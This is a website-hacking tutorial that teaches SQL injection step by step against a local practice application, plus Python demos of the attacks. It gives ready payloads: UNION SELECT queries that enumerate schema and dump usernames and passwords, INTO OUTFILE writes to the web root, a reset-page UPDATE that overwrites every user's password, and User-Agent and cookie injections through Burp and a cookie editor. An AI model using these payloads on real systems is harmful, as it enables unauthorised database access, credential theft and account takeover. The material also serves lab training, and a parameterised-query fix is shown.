
Website Hacking Course

1. Different Types of Website Attacks

2. Different Types of Websites :-

A. Static Websites = pages that are served identically to every visitor; nothing on the server changes with the request


B. Dynamic Websites = pages generated per request, for example according to the user or their login state; these take input, and input is where injection happens

3. Different Website Languages :-

4. Different Web Protocols

A. HTTP = Hyper Text Transfer Protocol, sent in plaintext


B. HTTPS = Hyper Text Transfer Protocol Secure, HTTP carried over TLS. Only the transport is encrypted; an injection payload travels inside the encrypted request exactly as it would over HTTP
5. Website Response in Static Website

6. Website response in Dynamic Website

7. SQL queries which PHP uses to interact with the database. Example:


8. Structure of Database

9. Install the XAMPP server to create a demo server in VMware


10. phpMyAdmin is used to manage the DB graphically

11. GET vs POST

A. GET = input given via the URL query string (?id=1); it is visible in the address bar, the browser history and the server logs


B. POST = input sent in the request body, typically by a form on the website; it does not show in the URL, but it is just as easy to tamper with from a proxy

12. Cookies vs Sessions

A. Cookies = a persistent way to maintain a login and to track users for advertising. A cookie is a small text record stored by the browser on the user's computer, so the user (or an attacker) can read and modify it, and the server has to treat it as untrusted input
B. PHP Sessions = a temporary way to maintain a login. The session data lives on the server; the browser only holds a session ID cookie (PHPSESSID), which by default is discarded when the browser is closed, so the session ends
13. Install the HT Web Application in XAMPP

14. Let's start with lesson number 1 in the HT Web Application


15. Let's start by giving input via the GET parameter id

It returns a username and password. What is echoed back is whatever the site's author chose to display; any column of the result could have been shown instead

16. The first step is fuzzing the application: append extra characters (a single quote, a double quote, a backslash) to the input parameter in the URL and watch for a database error

17. Now copy the error message and guess the query from it

Select username, password from Table_name Where id = 1


18. The MySQL error wraps the offending fragment in its own quotes; delete that outer pair, one from the end and one from the beginning, and what remains shows how our input is quoted

Select username, password from Table_name Where id = '1'

We can see from the error that it is using single quotes

19. The next step is to balance the query: we have to get out of the quoted id value, and everything after our input has to be neutralised so the statement still parses

Select username, password from Table_name Where id = '1' --+ '

So what we type in addition is 1' --+ : the quote closes the string and -- comments out the rest of the line. In MySQL -- only starts a comment when it is followed by a space, and the + is decoded to a space by the web server, which is why it is written --+ in the URL

20. Let's check it in the web application

It works well. Now perform the same steps on lessons 2, 3 and 4; the quoting around the input differs there, and the error message tells you how to balance it.


21. Now we can start fetching data, but first we need the number of columns the original SELECT returns, because a UNION only works when both sides have the same count

No error on ORDER BY 1. Try ORDER BY 2, ORDER BY 3, ORDER BY 4, and so on until we get an error

22. On ORDER BY 4 we get an error, which means the website's query uses 3 columns

23. Now use UNION SELECT 1,2,3 (three placeholders, because there are three columns in the statement). Give an id that matches no row (1000 here) so the original SELECT returns nothing and the page displays the row from our UNION instead

?id=1000' union select 1,2,3 --+


2 and 3 are printed on the screen, so columns 2 and 3 are reflected in the page. The numbers themselves are arbitrary markers; what matters is that there are exactly three of them

24. Since 2 and 3 are printed on the screen, we replace just one of those markers with the expression whose result we want shown, for example database() for the current database name

25. The database name found is "security". The enumeration always goes in this order:

A. Database name
B. Table names
C. Column names
D. Data
26. To find table names we use the system database information_schema, which lists every table and column the DB user can see

union select 1,2,group_concat(table_name) from information_schema.tables where


table_schema='security' --+

27. Now we need the column names of the interesting table (add and table_schema='security' to the WHERE if a table of the same name exists in another database)

union select 1,2,group_concat(column_name) from information_schema.columns where


table_name='users' --+
28. Find all the column names the same way for every table found in step 26

29. Now fetch the data from users: put the column names from step 28 into group_concat in the same UNION

The same thing has to be performed on the emails table and on lessons 2, 3 and 4.


30. Lesson number 7: no output and no error

31. With nothing echoed, the only signal is whether the page behaves normally. Guess the query by trying ORDER BY with each candidate way of balancing the quotes; nothing works until the balance is right
32. Once we balance properly it works fine

Use the OUTFILE function: SELECT ... INTO OUTFILE '/path/file' writes the result to a file on the database server, and if the path is inside the web root we can fetch the file with the browser. This needs the FILE privilege, a directory the MySQL process can write to, and secure_file_priv not restricting the location


33. Now we can see the results in the newly created files. Swap in the enumeration queries from steps 26 to 29 to write out other data

34. Now we perform the same steps with POST in lesson 12

Use a backslash to generate the error: in MySQL a backslash escapes the quote that follows it, so a lone \ leaves the string literal unterminated and the error reveals the quoting. Then use ORDER BY to get the column count
35. Now use UNION SELECT

The same way we dig out the data with the other commands

36. Lesson 13 is POST with OUTFILE: generate the error, then send the output to a file as in step 32

37. Password Reset Page SQL Injection


38. Break the query

39. We can see it is using single quotes, so now we build the injection. The reset page updates the logged-in user's password with a query of this shape:

Update users set password = 'INPUT' where username = 'Input'

Update users set password = '' or 1=1 # ' where username = 'Input'

This resets the password of every user to 1: MySQL evaluates the SET expression '' or 1=1 to 1 (true), and the # comments out the where username part, so the update has no filter left and applies to all rows
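The reset-page injection of step 39, as an added example that is not part of the course: the vulnerable UPDATE is emulated in Python with sqlite3 in place of MySQL and a constructed users table, and the parameterised version is shown beside it. Two assumptions are labelled in the code: the query shape (UPDATE ... SET password= ... WHERE username= ...) follows the text above, and the payload ends in -- rather than # because sqlite does not recognise MySQL's # comment.

```python
import sqlite3

# Constructed users table; sqlite3 stands in for MySQL so the demo runs offline.
# sqlite does not understand MySQL's # comment, so the payload ends in -- instead.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
    INSERT INTO users VALUES (1,'alice','s3cret'),(2,'bob','hunter2'),(3,'admin','Pa55w0rd');
""")
ERROR_BANNER = "You have an error in your SQL syntax"


def reset_password_vulnerable(username: str, new_password: str) -> str:
    """The reset page as the lesson describes it (assumed query shape): the new
    password goes straight into the UPDATE and the WHERE is meant to limit it
    to the one logged-in user."""
    sql = f"UPDATE users SET password='{new_password}' WHERE username='{username}'"
    try:
        db.execute(sql)
        db.commit()
    except sqlite3.Error as exc:
        return f"{ERROR_BANNER}: {exc}"
    return "Password successfully updated"


def reset_password_safe(username: str, new_password: str) -> str:
    """Same operation with bound parameters: the input can never change the
    statement's structure, so the WHERE clause always applies."""
    db.execute("UPDATE users SET password=? WHERE username=?", (new_password, username))
    db.commit()
    return "Password successfully updated"


def passwords() -> dict:
    """Current password per user; str() because MySQL stores the injected
    result as the string '1' while sqlite hands back the integer 1."""
    return {u: str(p) for u, p in db.execute("SELECT username, password FROM users")}


def demo() -> dict:
    out = {}
    # Step 38: a lone quote breaks the statement and the error shows the quoting.
    out["break"] = reset_password_vulnerable("alice", "'")
    # Step 39: '' or 1=1 evaluates to 1 and the comment removes the WHERE clause,
    # so every user's password becomes 1 although we only acted as alice.
    out["inject"] = reset_password_vulnerable("alice", "' or 1=1 -- ")
    out["after_inject"] = passwords()
    # The same payload through the safe version changes only bob's own password,
    # to exactly the literal text that was submitted.
    reset_password_safe("bob", "' or 1=1 -- ")
    out["after_safe"] = passwords()
    return out


if __name__ == "__main__":
    for step, value in demo().items():
        print(step, value)
```

The point to take from the safe variant is that the payload is harmless not because it was filtered but because a bound parameter is never parsed as SQL; the WHERE clause survives whatever the user types.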
40. In chapter 18 we cannot break the query directly through the form, so we have to use Burp Suite to create the error

First configure Firefox's network settings to send traffic through Burp's proxy.


41. Now open Burp Suite and open the website by its IP address, not localhost: Firefox bypasses the proxy for localhost, so those requests would never reach Burp.

Intercept the request in Burp and change the User-Agent header to \

The header value reaches a query, so the backslash generates the error we could not produce through the form.
This is how we proceed in every lesson with Burp Suite: inject into the different fields of the request (headers, body, cookies) that the form itself does not let us edit

42. The next chapter is cookie injection: if we cannot inject anywhere else, the next thing to try is the cookie. Install the Cookie-Editor add-on in Firefox

The username is stored in a cookie, which we can change to another user's name, or we can put union select statements in it
The same way we can dig out all the data with the other commands

43. In chapter 21 the cookie is encrypted: it is still the username, only in encrypted form, so we have to put our injection through the same transformation before placing it in the cookie
We can see the error is generated; the same way we can give the other commands as encrypted values to perform the other injections.
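Cookie injection (step 42) and the transformed-cookie variant (step 43) as an added worked example, not code from the course. It emulates a cookie-based login page in Python with sqlite3 in place of MySQL and a constructed users table. Assumptions, also marked in the code: the cookie is named uname, the page looks the user up with SELECT * FROM users WHERE username='...', and base64 is used as the transformation for the chapter 21 case purely for illustration, since the course only says the value is encrypted without saying how.

```python
import base64
import sqlite3
from urllib.parse import unquote

# Constructed users table; sqlite3 stands in for MySQL so the demo runs offline.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
    INSERT INTO users VALUES (1,'alice','s3cret'),(2,'bob','hunter2'),(3,'admin','Pa55w0rd');
""")
ERROR_BANNER = "You have an error in your SQL syntax"


def parse_cookie_header(header: str) -> dict:
    """Lenient Cookie-header parsing in the style of PHP's $_COOKIE: split on ';'
    and the first '=', percent-decode the value, keep whatever is left."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.split("=", 1)
            cookies[name.strip()] = unquote(value.lstrip())
    return cookies


def page_for_cookie(cookie_header: str, encoded: bool = False) -> str:
    """Emulated cookie-login page: the uname cookie (assumed name) is read and
    concatenated into the lookup query (assumed shape).  encoded=True models
    chapter 21, where the cookie is the transformed username; base64 is the
    assumed transformation here, the course does not say which one is used."""
    uname = parse_cookie_header(cookie_header).get("uname")
    if uname is None:
        return "Not logged in"
    if encoded:
        uname = base64.b64decode(uname).decode()
    sql = f"SELECT * FROM users WHERE username='{uname}' LIMIT 0,1"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"{ERROR_BANNER}: {exc}"
    return "" if row is None else f"Your Login name:{row[1]}\nYour Password:{row[2]}"


def cookie_for(payload: str, encoded: bool = False) -> str:
    """What to paste into the cookie editor: the raw payload, or for the encoded
    lesson the payload run through the same transformation as the username."""
    value = base64.b64encode(payload.encode()).decode() if encoded else payload
    return f"uname={value}"


# One UNION that pulls every username and password out through the cookie.
DUMP_ALL = "' union select 1,group_concat(username),group_concat(password) from users -- "


def demo(encoded: bool) -> dict:
    return {
        "as_admin": page_for_cookie(cookie_for("admin", encoded), encoded),   # impersonation
        "broken": page_for_cookie(cookie_for("admin'", encoded), encoded),    # the error
        "dump": page_for_cookie(cookie_for(DUMP_ALL, encoded), encoded),      # full dump
    }


if __name__ == "__main__":
    for mode in (False, True):
        print("encoded" if mode else "plain", demo(mode))
```

If the cookie editor refuses spaces in a value, percent-encode them (%20); the parser above decodes them the way PHP does. The encoded run produces the same three pages as the plain run, which is the whole lesson of chapter 21: the transformation is not a defence, the payload just has to be wrapped the same way the legitimate value is.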
